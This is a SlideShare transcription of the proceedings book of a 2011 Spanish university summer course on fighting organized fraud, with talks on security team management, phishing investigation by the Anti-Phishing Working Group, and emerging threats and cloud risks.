Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The technological fight against organize fraud


Published on

2011 Summer Course Book. 109 pages.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

The technological fight against organize fraud

  1. 1. The technological fight against organized fraud 2011 Summer Course Rey Juan Carlos University Aranjuez, 4–8 July 2011
  2. 2. PUBLISHING PRODUCTION DESIGN AND LAYOUT Miguel Salgueiro / MSGráfica PRINTING AND BINDING Gráficas Monterreina Legal Deposit: M-22831-2012
  3. 3. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo INDEX INTRODUCTION ......................................................................................................................................................................................... 5 Santiago Moral Rubio PROLOGUE ................................................................................................................................................................................................... 7 Pedro González-Trevijano SECURITY AND BUSINESS: THE HEDGEHOG’S DILEMMA ................................................................................................ 9 Alberto Partida ANTI-PHISING WORKING GROUP ................................................................................................................................................... 15 Gary Warner Threat Horizon: Identifying Future Trends ........................................................................................................... 21 Adrian Davis THE RISK OF THE UNPREDICTABLE: “THE BLACK SWANS” ........................................................................................... 27 José Antonio Mañas ROUND TABLE. NEW THREATS ........................................................................................................................................................ 33 Taking part: David Barroso Fernando García Vicent Juan Jesús León Cobos Elena Maestre García Alfonso Martín Palma Rafael Ortega García Tomás Roy Catalá Juan Salom Clotet Marta Villén Sotomayor Marcos Gómez Hidalgo Modera: José de la Peña
  4. 4. Centro de Investigación para la Gestión Tecnológica del Riesgo The technological fight against the organized fraud 2011 Summer Course The rise of cybercrime: How lagging security measures fuel the growth in organized fraud ................................................................................................. 45 Richard Stiennon FROM HACKING TO ARTIFICIAL INTELLIGENCE ................................................................................................................... 51 Víctor Chapela LEGAL CERTAINTY AND CRITICAL ASPECTS OF DATA PROTECTION ............................................................................................................................. 57 Francisco Javier Puyol THE LAW OF PERSONAL DATA PROTECTION IN MEXICO ................................................................................................ 63 Ángel Trinidad Zaldívar DATA PROTECTION AND THE NEW TECHNOLOGICAL CHALLENGES ...................................................................... 69 Artemi Rallo ROUND TABLE: PRIVACY IN “THE CLOUD” ................................................................................................................................ 75 Taking part: Manuel Carpio Cámara Francisco Javier García Carmona Guillermo Llorente Ballesteros Idoia Mateo Murillo Justo López Parra Francisco Javier Puyol Carles Solé Pascual Modera: Esperanza Marcos Understanding and Managing SaaS and Cloud Computing Risks ........................................................................................................................................ 85 Tom Scholtz THE DARWINIAN COEVOLUTION (As a strategy in the technological innovation applied to risk management) ......................................................................... 91 Santiago Moral Rubio PHOTO GALLERY ...................................................................................................................................................................................... 97
  5. 5. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo echnological globalization has led to a breakthrough in the participation of citizens in processes of public administrations and businesses that provide them with services, but the same risks that exist in the real world have moved to this field. The crimes of low intensity, without harming people or their property, were unprofitable in the physical world and therefore are little persecuted; however, technological globalization makes that they are profitable and continue to be of small risk because of the international technological anonymity. Therefore, the risk morphology changes as the parameters of profitability change and that makes now phishing profitable as it is anonymous and massive. Risks change and the way to manage them change. The same technologies that have allowed creating this globalized world must be used to manage the new risks existing in the virtual world. For example, one of the emerging risks is the ease of transmission and replication of the personal data of citizens. In order to talk about all this, the Research Center for Technological Risk Management convened a Summer Course (within the framework of Summer School at the Rey Juan Carlos University) that was held in Aranjuez (Madrid – Spain) between the 4th and 8th July 2011 inclusive, with the active participation of almost 100 attendees and some of the main speakers at the global level in this field. Now, in this publication, we transfer to those interested the transcription of the papers presented at the Summer Course. INTRODUCTION Santiago Moral Rubio (Director of the Summer Course “The technological fight against organized fraud”)
  6. 6. Centro de Investigación para la Gestión Tecnológica del Riesgo The technological fight against the organized fraud 2011 Summer Course
  7. 7. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo hat two major institutions of the economic and financial and academic life, as BBVA and the Rey Juan Carlos University, put together their experiences and, above all, the qualification and competence of their teams, to create experiences of training, research and innovation, could only be the advance of great and encouraging contributions to the scientific community. Thus was born the Research Center for Technological Risk Management. Under the leadership of Santiago Moral Rubio and Francisco García Marín last July the course “The technological fight against organized fraud” was held within the summer courses that the Rey Juan Carlos University holds annually at the Royal site of Aranjuez. The response of the scientific and academic community was massive. The participant’s level was extraordinary. And the result of work, rigor and the seriousness of the summer experience of 2011 is today reflected in this magnificent volume. The need to respond to new formats of risk and fraud, adapted to a global technological reality, is a genuine requirement of an also universal life experience. The significant of the contribution that this work contains is the ability of academic institutions and centers of research to detect problems, build effective solutions and responses and, straight afterwards, transferring this knowledge to the society. The Research Center for Technological Risk Management has become not only a leading resort in this area, but also an example of the intense collaboration that universities and companies can and should undertake in a historical setting more demanding. But, above all things, an exciting and motivating environment; an environment of opportunity and challenges for energy, the reflection from the analysis, and creativity. I am convinced that the work of the Research Center for Technological Risk Management will continue to bring, in the immediate future, new grounds for satisfaction like this magnificent work. PROLOGUE Pedro González-Trevijano (Rector of the Rey Juan Carlos University)
  8. 8. Centro de Investigación para la Gestión Tecnológica del Riesgo The technological fight against the organized fraud 2011 Summer Course
  9. 9. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo he philosopher Schopenhauer baptized the expression “hedgehog’s dilemma” to explain, in his view, how the personal and social relationships worked. According to his research, the human must assume the following paradox: find the collective heat necessary for our survival and avoid any damage that might arise from such interaction with others at the same time. As the hedgehog that seeks company, but must avoid spikes of others hurt him or do so with their own. Hence I could also explain the perspective from which I took, five years ago, the challenge of creating a security team that was in tune with the business; and the reason why I decided to write a book. The challenge has been to find a way in which we avoid the damage of the respective “quills” between business and security, seeking at the end more similarities in the interaction of the penguins, species that can reach intimacy more than hedgehogs as they don’t have spikes and have no fear to hurt or be hurt. The first change I assumed in the definition of my security team was to modify the original name, from “security administration team” to “operational security team”, where we took on the security of the information on production systems; but maintaining the challenge: achieve a harmony between the security team and the business. Alberto Partida (Security specialist Author of the book “IT Securiteers. Setting up an IT Security Function”) SECURITY AND BUSINESS: THE HEDGEHOG’S DILEMMA
  10. 10. Centro de Investigación para la Gestión Tecnológica del Riesgo10 The technological fight against the organized fraud 2011 Summer Course To achieve this, the issue must be addressed from two perspectives: one, scientific or methodological (analyzing filters, methods and the steps to take in the next stage) and another, human (focusing on the need for a multidisciplinary team, that work with passion and motivation and fight for innovation). The methodological element: the method and 5 filters Understanding the organization, adapt to their culture and harvest successes… or at least limit the level of frustration. This is what we want to achieve, and for that we need a method. And the method is based on the following formula: Vulnerabilities x Threats – Measures to mitigate = Risks (VxT–M = R). The impact and the probability should be taken into account (very used terms for each of the risk situations), and also the malice of the attacker, though many times we overlook it. And finally, we find the existence of a ratio, referred to the relationship between the benefit that the attacker gets and the risk to carry out that attack, which is often very unbalanced, as in the case of the attacks from Anonymous, where the attacker assumes a minimum risk compared with the benefits he is looking for. This ratio is much more even in physical security. At this point, we can deal with the existence of five filters, which I prefer to call “1 + 3 + 1”, to explain the risk scenarios that we must deal with. The first of these refers to, on the one hand, the fact that real threats are equal to the detected, ignoring those that we believe are real or pretend to be (hence the importance of monitoring); and, on the other, consequently, that the real opponents are likewise the detected ones. In regards to the second filter, impact and ratio between benefit and risk, this means working in the organization with risk scenarios which have a high impact, but a very low risk for the attacker. The third filter talks about resources and complexity, and the need to be “friendly” to the client. In this sense, of all risk scenarios, we must deal first with those requiring less amount and complexity of resources, and those that do not harm or weaken the daily experience of the user or client; i.e.: “what can we do with few resources and at the same time not damaging the life that the client had”. The fourth filter refers to getting to have a positive image of the security team, within the organization. And, finally, the fifth filter is related to the need to be very realistic, complying both with requests from the Management team and with the regulation. And… how do we comply with these five filters? The answer is simple: with a suitable method, that will make us go “step by step”, and that is simple and limited in time.
  11. 11. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 11 Although it is somewhat shocking, the first years only 40 percent of the resources have to be planned; and when it comes to the technical elements to protect, these must be: networks, systems, applications, data and identities. The human element: Professionals with passion Although so far we have dealt with the methodological element, with the need to resort to a method and overcome the five filters exposed before, we will now enter in the idiosyncrasy of the second element which I meant to achieve the necessary harmony between the security team and the business part, which deals with the human component. Here we return to the metaphors of hedgehogs and penguins to refer to human relations and the need to strengthen ties with others, with other departments in this case, while the spikes of none of them hurt the counterpart. I believe it is essential to have a highly qualified technical team, either people of technical profile or who have many years of training that support their knowledge. But we don’t remain there... is crucial to bet on multidisciplinary team capabilities to avoid being isolated in the organization. This, in essence, means to establish ties with other departments and areas, those to whom we communicate our work and our goals to achieve that greater harmony of which we speak from the beginning. Avoid being separated from the rest, and that no one can say that of “there those of safety are…” as if we were entities out of the business. We also need experts in public communications or marketing. They are essential for a security team, and are in two dimensions: in all their professional practice, which can be applied within the team; and also as conduits of these new perspectives for the group members, to whom they can gradually provide new ideas in these scenarios of marketing and communication... because we also need to advertise our message and our tasks. And not only that, it is also a priority to count within the team with other profiles, such as statisticians, economists, business people, etc. However, I must admit that I have not seen teams where there are other profiles besides the technical, though I firmly believe that a varied set will give much better results to the organization. When creating these multidisciplinary teams, I propose two models to follow, and a common slogan for both: “share, respect and mobilize”. For me, sharing information is essential to go deeper into internal consistency and success of results. The concept of “mobilize” is also a priority, rather than “motivate”, because this latter term is a term more focused to the personal sphere and is something that only can be owned on an individual basis, is not something that can promote from the team. That’s why, I refer more to “mobilize” and the respect for members of different origin.
  12. 12. Centro de Investigación para la Gestión Tecnológica del Riesgo12 The technological fight against the organized fraud 2011 Summer Course In this context, the first model can be summarized in one sentence: involve in the group people who benefit from a degree of balance among all aspects of his/her life, professionally as well as emotionally and socially. It’s about paying attention not only to the professional aspects of the team members, but also to their dimension as human beings. We must take into account the balance between their personal and emotional life, because that will decisively influence in his/her professional side; so that organizations that do not take into account this model to select the members of their department, can discover later problems arising from the interaction among their members. And it is that there are very good people at a professional level, but with very few resources in the other two fields, and vice versa; and what we need is someone who keeps a certain balance among these three areas of his personality. This is what will lead us to the success of the team; without it, it won’t be possible. On the other hand, the second model meets its crossroads in the passion with which we perform a specific work… the crossroads between what you like to do and what you are good at making. And based on that premise, find that “something” that the market requires and that can be adjusted to what the professional, and the group of professionals, can offer. It is, in essence, a very simple model, and that can serve as a guide to decide in what area or scenario to specialize. More than one leader and continuous learning At this point, I would like to transfer another key message: we must avoid having a single leader, and count, on the contrary, with the collaboration of two or three people who assume that role in a collaborative way. The explanation is simple: the leader work is quite tense and always will require to have two or three close partners to achieve his/her goals, among which we can mention some very significant: identify persons who do not have much motivation and, perhaps not so many priorities, to help them to find the way that takes them to be closer to the segment of the group which is really motivated. Thus, they will be helped to develop new skills, so they can reach, even, what we call the “critical mass of the team”, which are those members with great skills, motivated and who set the pace of work to all. Because of that, precisely, models like those outlined above should be applied, so that these members remain in the team, and do so as members of quality. In parallel with everything explained so far, and as we also advanced before, we must not forget the significance of sharing knowledge among all members of the team, which is what will make the group strong and consolidated.
  13. 13. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 13 We may share both, the knowledge obtained by academic training, and the accumulated as a result of long years of professional experience. Learning among members will be constant, thanks to the communication in all directions and regarding all the tasks to be performed. And it is that the set will grow when they learn from each other; otherwise impossible. But to achieve this and reach the harmony between the security team and the Management we have been talking about from the beginning, is essential also, and now we talk explicitly about the role of Management, that it supports the actions of the team, either with adequate budgets, with technical resources, with more provision of personnel, etc. If this doesn’t happen, the degree of frustration of our staff may increase significantly. Five provocations to the audience To continue, and like a kind of “alternative ideas bank”, I propose to the audience the following “five provocations”. The first of these has to do with the possibility of considering your CERT as your team of “guerrilla marketing”. And to illustrate this option, and although they are not in our sector, I am telling you some recent examples that I found: placing a Mercedes Benz vehicle at an European airport, so the public try it and get acquainted with its performance; or giving out the typical yogurt, for example, when leaving the subway early in the morning, inviting us to be potential consumers. The idea is to apply this to the incident security team.. Not that we give out yogurts, but take care of our incident response team to become our most powerful marketing tool inside the organization. When a security incident occurs, the people is disturbed in the company and need to know where to go and, even more, have a sense of protection, so that everything is controlled. If you prepare the ground, if you are clear about the elements to be taken into account and if, moreover, you’ve bet on a marketing component, everything improves. It is similar to what happens in physical security, which when a disaster happens, the emergency services arrived at the place of the incident dressed with a particularly striking clothing, such as reflective vests. Everyone focuses on them and trusts on their instructions. The second provocation to which I refer is what I call “the graffiti effect”, or the power of images. I will give an example: a few months ago I noticed that in the public baths of a palace of conventions someone had stolen the toilet disinfectant dispenser; and when I returned, a few days ago, it was still without replacement. The situation remained equal, and that means a devastating visual effect when it comes to trust on, in this case, the cleaning of these baths. I call it “graffiti effect”, because it’s like thinking about a clean wall and another full of graffiti… Which of the two invites to make a new one? In which does it feel it won’t matter that there is one more?
  14. 14. Centro de Investigación para la Gestión Tecnológica del Riesgo14 The technological fight against the organized fraud 2011 Summer Course It is the same thing that happens with the security team. It is important that their facilities are professional and attractive. In addition to other details which benefit obtaining a better image, both inside and outside the organization, educating employees about passwords, take care of confidentiality, avoiding confidential papers on the tables and things like that… When it comes to the third of these five provocations, this is the one regarding using social connectors, as they are defined by Malcolm Gladwell in his book “Tipping Point”. In the book, the author refers to some characters, the social connectors, though not being members of the Management know all employees of the organization and have a high degree of connection with all active agents of the company. The proposal is to identify these people within the company, and invite them to join our tasks, not as part of the team, but as facilitators and transmitters of the messages that we want to bring to the members of the corporation. They will help us to make the employees, suppliers or customers aware of everything that we have decided to implant within the company. For example, we can give them a confidentiality filter for their laptop, being sure that they will recommend it to their colleagues; or invite them to an attractive seminar where they can just take away something tangible related to security, or teach them to create a strong password. The idea is to take advantage of what we have in the smartest way, peer to peer communication, take advantage of the communication and the information that flows at the same level, never as an imposition. On the other hand, the fourth provocation focuses on what is known as “the power of free”. No one can abstract from the attraction that everything that is free exerts on us. If we give away encrypted memory devices or display protectors, surely we will have its use assured. Finally, the fifth provocation refers to the axiom that “security may not be destructive” because if this is our attitude towards the organization we run the risk of isolating ourselves. It is more important to be present in key projects of the organization rather than complete your own particular one. In short, and as a former professor said, business exists to do business, not to do security, except for the security business, which is why we should always not lose sight of the lesson of humility and be aware of the fact that, like everyone, we are also dispensable. In this context, and to recap, if we want to successfully develop our work as department of security, and find that harmony which we talked about, we need a few methods, filters, some steps to follow, and a multidisciplinary team, with passion, motivation and desire to innovate.
  15. 15. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 15 will start my presentation with a reflection: although it seems that people always prioritize the economic factor, and what criminals are looking for is always money, I really believe that there is a much more important factor: reputation. Recently I asked a Senator in the U.S. If he has ever got a phishing attack and he said yes. He told me what bank was supplanted and I asked him his opinion about what should be happening to his bank allowing such attacks against its brand. And he replied that most certainly those at the bank were not aware that they were under attack, because they otherwise wouldn’t allow it. I think that good reputation is more important than all the gold in the world. And the reputation factor is what we must consider when we allow a phishing attack to continue or not. It’s that and the impunity that benefits the wrongdoers. We analyzed 85,000 phishing websites of affected banks… And do you know how many of the criminals go to jail? Only 1%, which means that for the remaining 99% is worth committing these crimes. There are three areas to which we attach special importance within our working group: The Training of the professionals that tomorrow will fight cybercrime (which will be even more complex). The preparation of the best tools and most effective techniques in this fight, helping also the special units of the law enforcement and security Gary Warner (Director of Research in Computer Forensics. The University of Alabama at Birmingham) ANTI-PHISHING WORKING GROUP
  16. 16. Centro de Investigación para la Gestión Tecnológica del Riesgo16 The technological fight against the organized fraud 2011 Summer Course agencies (we work very closely with the specific unit of the FBI for these matters). Educating the public in existing cybercrime threats. In my laboratory we have 35 jobs and organize them in three different zones: one for spam and phishing, another one for malware and forensic analysis and then the research part. The latter is where the students really relate with the law enforcement and security agencies, learning what’s important and where to focus first when detecting signs of cybercrime. And based on all the data that we handle there, they learn to perform and formalize an investigation in this scenario. We have a spam project, where we have recovered more than 500 billion emails that we have already made available also for the law and security enforcement agencies. There we work on how we can identify malware in order to know who the criminals that have sent these messages are. We have a specific computer for cybercrime, with 14 dedicated servers and another ninety something to store information, and with them we do analyses and studies and give support to the law enforcement forces. We also work with the drug enforcement administration, even with cybercrime bodies in Germany or the Netherlands. To carry out our work, we must analyze many processes to determine if it is a phishing website. And if we succeed, then, automatically, we look for a phishing record. We start the manual search and try to figure out the relationship among this phishing site and other phishing websites that we have seen in the past. It is important to know the relationships among the various phishing pages, because, as we like to say here, not all criminals are equal, and if we understand the relationship among the websites, we will understand also what kind of criminal we are facing. For example, recently we discovered a curious case in a bank of Alabama, where a Nigerian man took advantage of copies from the month of February, considered as the black history of the bank, to make phishing against the bank. We had everything from him, his Facebook page and we knew who his friends were. It also happened to us with a phishing to Bank of America, that have in their department more than 800 detected phishing websites against their bank, and there we did make a hard work to relate all of those websites. Seven steps to a phishing research As I said, we try to find the relationship among the phishing web in question and the others where we have detected the existence of an affinity relationship. We introduce what we are being asked for (user id, password, answer three security questions, enter again the email address and then a passkey…) and we start to realize that a true website doesn’t work like this.
  17. 17. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 17 The operation is simple: when the website gets what it wants, it sends us to the bank website and when we wonder who has sent us there, we can see the files on the server. And then we can detect how many phishing websites have 100 victims and how many have 1,000, for example. And we can also identify the customers who have visited the phishing website. What we do, basically, is to follow in seven steps the methodology that we have created for the investigation of phishing. First we prepare an electronic program that is sent to the client and then analyze the file in question. Afterwards we try to determine how this website relates to the other websites that we have seen earlier and then we look at the logs, both on the website of the victim as well as on the phishing website. That’s when we are able to identify who has been sabotaging the website to introduce the phishing data. We then find a lot of information on the offender, who is the one introducing most data on the phishing website, because he wants to make sure it’s working. In fact, the first address we see is nearly always the IP address of the attacker. We may collect all logs in different websites and we can see the same IP address for different phishing websites. As I said at the beginning, in the U.S. we work very close to the law enforcement and security agencies. They usually handle lots of data, but they often do not know how to process them, and then we do it with our tools, in our laboratory. By looking at the accounts in Yahoo, Hotmail or Gmail we find out who the victims are. In the last part of the research what we do is open source intelligence, making an analysis of the file. We can take as an illustrative example a phishing website that operated against BBVA. It was designed from a hotel in Barcelona, whose website had been sabotaged to operate as a phisher of BBVA. On this website we discovered the emails of the criminals, who use them to steal the credentials. Following the investigation, we find the same phisher and email address in 8 different websites. In other researches we found phishing attempts with similar characteristics in 29 different websites. With this we demonstrate that when someone makes a phishing research on their brand, often they are so focused on it, that cannot imagine that the same offender is also attacking the competition. On the other hand, we should pay attention to the errors committed by criminals, because they do commit them, and many times these errors are crucial to find them. We had a case of a phisher who organized more than 100 phishing websites. And he thought that his secret address was safe, but it was not so much and from the group we managed to identify him. We also managed to identify all sites or websites of phishing that he had changed and the email accounts he was working with.
  18. 18. Centro de Investigación para la Gestión Tecnológica del Riesgo18 The technological fight against the organized fraud 2011 Summer Course Success in research Fortunately we can say that there have already been quite a few successes which support our work and our dedication in the fight against anti- phishing. With our collaboration more than 70 people who were carrying out fraudulent activities in different countries of the world were arrested. And in another recent research we detected criminals in Romania and Spain, among other countries, dedicated to make phishing websites. Another research that I would like to highlight is one that we carried out in the U.S. and ended with the detection of a person that he had been living in Egypt and on his return to the U.S. he began to work as a translator of Arabic. During his stay in Egypt he met many people, and it seems that almost all of them were offenders, and when he returned to our country deployed a complex network of collaborators of first and second level, in different States, such as California, Nevada, Carolina, etc. These second level connections withdrew money from ATMs with a false identity and were seding money to Egypt. After a period of research, we managed to have pictures of each and every one of these people. There were 33 people involved within our borders and over 100 worldwide. At the end the plot was stopped and the ringleader and he got 13 years in jail, for crimes of phishing and, by the way, also by cultivation of marijuana. In 2011 we also investigated the case of three corporations, against whose brand more than 500 phishing websites were operating. It was also one of our most important investigations and we got breakthroughs with it. In any case, what we always like to say, so everyone is aware, is that offenders are also successful. They can intercept money very easily with the user id and password. Having said that, what matters is not so much that websites are designed, because of these we can find hundreds of cases. What matters is that these sites end up getting what they were designed for: illicit money. Malware, more expensive In addition, I also wanted to comment on the matter of malware, whose vulnerability cases end up being more expensive than those caused by the phishing. According to some studies, for every dollar lost in phishing, three are lost in malware. One of the most advanced is a keylogger called Zeus, which (once the keyboard activity is detected) can take remote control of your computer without much problem. However, for this type of fraudulent techniques, in the part of the investigation we have others that can counteract its effects. For example, there are options to get the website to detect if you are using a computer other than the usual and alert you in such cases. For example, it happened to me just yesterday. I wanted to send money to my daughter, and it told me that I was in a computer that wasn’t mine and
  19. 19. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 19 asked me another way to confirm my identity. I introduced the other passkey and I could perform the operation. But the important thing is the warning I got saying that I was operating from another computer, putting one more barrier when it comes to move my money. Device fingerprints In parallel, we are also faced a vulnerability where a technique called “device fingerprinting” appears. And how we detect fraud in these cases? In the U.S. we have suffered some attacks in this respect. And more than 40 people have been arrested between New York and Ukraine, who had managed to steal more than 200 million dollars. The work dynamics in this case was very simple. A webpage giving problems to the user was accessed and the user was recommended to use a support telephone number that appeared on the same phishing webpage in order to solve these problems. The offender directly answered the phone and he asked for different information which then took the opportunity to use it in the phishing page. If we’d have been able to set up the configuration file this phone number would never show up. On these configuration files, one of the first steps that should be taken into account is to confirm if other banks are in the same configuration file because they are suffering from the same offender. And perhaps those could afford more advanced intelligence resources and could help us to see who “the bad guy” is and how to arrest him. A vulnerable end user It is true that a phenomenon such as phishing, which relies on social engineering, can only be prosecuted with the technological risk management. Particularly significant here is something that sometimes we forget, and it is that phishing depends on and is based on the existence of a vulnerable end user. As long as there are humans who make mistakes and don’t pay all the attention that these especially controversial situations deserve, risk will always exist. At the Anti-Phishing Working Group we have worked and will work to prevent this lack of awareness. And we will always try to make the banks aware of the messages they are sending. We must achieve a level of security, because of technology and tools, and the awareness of the banks themselves and their users, allowing us to defend from criminals. So, even though these know our user ID and password, cannot steal the money so easily. Conferences and meetings The Anti-Phishing Working Group was set up to share information, and that’s what we do at our regular meetings. We plan two major Conferences a year, and another General Summit between October and November. And, in addition, we hold our eCrime Researchers Summit, and the various local Committees, where we invite you to participate from here.
  20. 20. Centro de Investigación para la Gestión Tecnológica del Riesgo20 The technological fight against the organized fraud 2011 Summer Course
  21. 21. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 21 et’s talk about the future as a reality, as something that is concrete and that is already here, and we will be in a better position to understand why we are concerned about it and what are the threats and risks that await us in the Information Society. But talking about the future is talking about globalization. We live in a globalized world where borders no longer exist, where information technology management, or even malware management, can be outsourced. There is a very interesting book which I recommend, it is called “The World is flat: a brief history of the globalized world of the twenty- first century”, by Thomas Friedman, that is very illustrative for this purpose and that speaks precisely about this, the absence of borders and a new way of understanding the world. Things have changed a lot in recent years. Companies have done it by moving freely from some countries to others and expanding their supply chains. And this is still changing constantly. Just like supply chains and information security threats and risks. Also, the relationship with suppliers has new features. Now more than ever we must trust the provider, so they do what you want them to do, and even the most important, do what they say they’ll do, or that they are doing. And that’s the big difference. But the supply chain, in this movement for change, remains a critical component for organizations, its information remains of vital importance… and these changes make us lose also much of the information about it, we know less about how it works and operate. THREAT HORIZON: IDENTIFYING FUTURE TRENDS Adrian Davis (Principal Research Analyst. Information Security Forum - ISF)
  22. 22. Centro de Investigación para la Gestión Tecnológica del Riesgo22 The technological fight against the organized fraud 2011 Summer Course So that we are also facing a very important issue: How can we audit “the cloud”, taking into account that the cloud environment is constantly changing and is not a static system? Everything has changed, and what’s our problem? If we have many problems and succumb, the company succumbs and it will be a catastrophe, we will be heavily fined if we don’t comply with the regulations already enforced… How do we tell our colleagues and partners that the important thing is still the information? We have to be careful so the same that happened to the boy crying wolf so many times does not happen to us, the day when the wolf really appeared nobody believed him. Everything is information We see how the way we work changes and how we are entering another dimension, which has its own threats and its own problems. We have to be prepared, must pay close attention to what might happen, regardless of that occurring, or not. Progress is measured according to its utility and its popularization. In 1876 the telephone was not helpful because there were very few and the communication capacity was very scarce, but now we cannot live without it. Just as the social networks do, which extend their tentacles more and more and establish more and more relations among us. In any environment, information is related to information technologies and these are becoming the center of our live. The work of ISF And at ISF, what do we do to help understand this changing environment? Very simple: we collect information, talk to quite a lot of people of very different profiles and thus we approach legal, economic, cultural, political and technological factors, etc. and manage to have a more complete view of the world that lies ahead of us. Thus, we may know what the most important threats for the information security will be and how they will relate to the changes that we will suffer in the society in the near future. And we share all this information with the sector through the reports we publish and the meetings that we hold. I particularly have the luck to have managed this project from the last four reports. We hold several meetings a year and there we ask what the new technological trends will be. In Spain we will hold a call for the Regional ISF Chapter in March in Madrid; and there, among other topics, we will talk about the security in industrial environments, the protection of critical infrastructures and the work program of ISF for this year. As I said, in these meetings we speak with people who work in manufacturing, banking, health care, and also talk with the World Economic Forum and futurists (I highlight here a book entitled “The next 50 years”, which is very interesting); and then we put everything in common in our annual Congress, to be held from 4 to 6 November in Chicago. And it is from there when we gather
  23. 23. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 23 together the final information and the correct data to begin drafting the report. What we are seeing is that in United Kingdom, also in the U.S. and, above all, in the European Union an effort is being done to integrate, more and more, information and privacy regulations. In the European Union, on May 1st, 2011 the so- called “cookies law” came into effect, which says that the information of people who visit the web cannot be stored on cookies, unless expressly allowed. In the United Kingdom, for example, if personal information is lost, our Data Privacy Office can impose a fine of half a million pounds each times this privacy is violated. Most important threats for 2011 We know many anonymous attacks and many are simply caused by errors, which could be easily remedied. For example, because we do not have the patches installed or because we don’t update the servers correctly. And this is what we know, because after we have the unknown, and what criminals can do. And an environment that most certainly is not safe from the attacks of the cybercriminals is “the cloud”. More and more business migrate some of their platforms, or even critical systems, to “the cloud”. In view of this, what are the main threats in the Network? What does it work now against us? On the one hand, the illusion of borders does. We are now connected to many more people and do not even know that we do. We have all kinds of electronic devices, connected among them and with many other people, so that there is no longer a wall behind which we can hide our privacy. On the other hand, another threat on the Internet is the existence of weaker infrastructures. We depend on many organizations to make our business run well and to keep in touch. These sometimes have problems, and if they have problems, then our business suffers too. For example, if the Internet connection doesn’t work, we must wait for the ISP to stat up the backup system so the system failure affect us as little as possible. Moreover, laws are often written with much delay. When they are approved, the threats against which the regulation was imposed have evolved to another level, what makes this regulation obsolete soon. And we are not evolving either at the same pace as the cutting-edge technologies do, such as geo- location, or key business aspects as supply chains, increasingly weaker and more relocated. Other important threats are also the increased number and sophistication of criminal attacks, the increasingly stricter rules and the characteristics of the outsourcing/offshoring environments. A note about the malware on mobile phones: we have barely encountered this threat because
  24. 24. Centro de Investigación para la Gestión Tecnológica del Riesgo24 The technological fight against the organized fraud 2011 Summer Course criminals do not find this scenario attractive. But that is only a small part; the important thing now is for us to avoid losing the phone with sensitive data inside. In London, every day up to 10 mobile phones are left forgotten in taxis, with very important data of the companies for which their users work. We must protect these devices, increasingly focused on the business and with increasingly confidential information. On the other hand, the business continuity plan becomes essential if we are to avoid major complications later. The cost of data loss per person per year for a company reaches $75, so if a company loses data of, say, 100,000 people, the cost is very high, and this is regardless of the fines, audits, etc. And it is that the rise of what we now call “digital human rights” is unstoppable. The right to be connected or to freely surf the Internet is already an acquired right that nobody is willing to lose. It is an interesting topic nowadays, and it will be more when the other countries of the world participate also in this connection. When Africa or Asia are truly integrated into our networks and claim the same role. And there we will have to solve a quantitative problem, because we will incorporate into our “cake” many millions of people. There will be many opportunities, but also many threats. And in the middle of this picture other topics will explode, such as Internet of things, devices that speak with devices without human intervention; and the shortening of the supply chain. We will no longer depend on a single source of supply, but from multiple sources. And it will be important to detect what will be the critical suppliers for our business. Four categories and 5 important points We can speak of four threat categories depending on whether we know them or not: that referring to those we know and that we can do something to work with. The things we know, but we can do nothing to avoid them. We also have threats where we have no idea. And, finally, those not considered by anyone but that can cause much harm to the organization. In essence, we must take into account: People are increasingly less loyal to the companies. There are environments that we cannot manage or control, like social media. The requirements demanded by different governments. Offenders’ optimized ways to deceive and earn more money. And, finally, we have our particular “Black Swans”. Then, what can we do? Start planning now. Work to make our systems more secure. And we will do so by following a few simple steps. First we have to look at the risks that can affect our organization and information, and then look at the threats that could harm us most. And once we have common ground on that, resort to using technology, and not only known technologies, but also those emerging that can
  25. 25. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 25 provide us with an extra protection. We must also have the necessary patches and updates, and pay the attention it deserves to identity management. And of course devote more resources to training and knowledge. Some data regarding this point: most organizations spend around 4 % of their budget on information security; but the companies that work better, with greater benefits and usually with fewer incidents, spend between 15% and 25% of their budget on programs of knowledge, because they think that it is what gives best results. 7 deadly sins of the cloud I’d like to list below the most common problems that exist in “the cloud”, which we also call the “7 deadly sins of the cloud”. The first would be to be familiar with what we want to manage after. The second, we always have to know our responsibilities, because “the cloud” provider will sell us a service, but we will always be liable for it. The third deadly sin is that we must understand very well what the provider will provide us and how we can measure it. We must be able to answer the following questions: are they doing what they say they are going to do? How do I know? And this is taking into account that evaluation in “the cloud” is different because everything changes. The fourth deadly sin has to do with breaking the law, as we may be breaking a law in a given country and not know it. The fifth is related to the chaos, disorder, what information is in “the cloud”, which is critical and sensitive and what I have to do with it. Sixth sin is vanity. Thinking that your infrastructures are perfectly prepared for “the cloud” because you have installed firewalls and other tools, thinking that it cannot affect you… And, finally, the seventh deadly sin is indulgence. We must ensure that our cloud provider has business continuity and disaster recovery plans. And lastly, “consumerization” Ultimately, we must keep in mind that the cloud technology has come to stay. It will not disappear and we must take full advantage of it. That’s why we must also educate our users to have more knowledge, and to see what devices we are going to support and what not, and what applications we are going to use and with what data. We must make these decisions today, because if we don’t tomorrow we will be flooded with information everywhere and we have decided no strategy in this regard. The best thing to do is keep up with changes. We must not intend to work as we do now. We must work towards business and because of business. And if business changes, we all change. Our world is going to change and we have to be prepared.
  26. 26. Centro de Investigación para la Gestión Tecnológica del Riesgo26 The technological fight against the organized fraud 2011 Summer Course
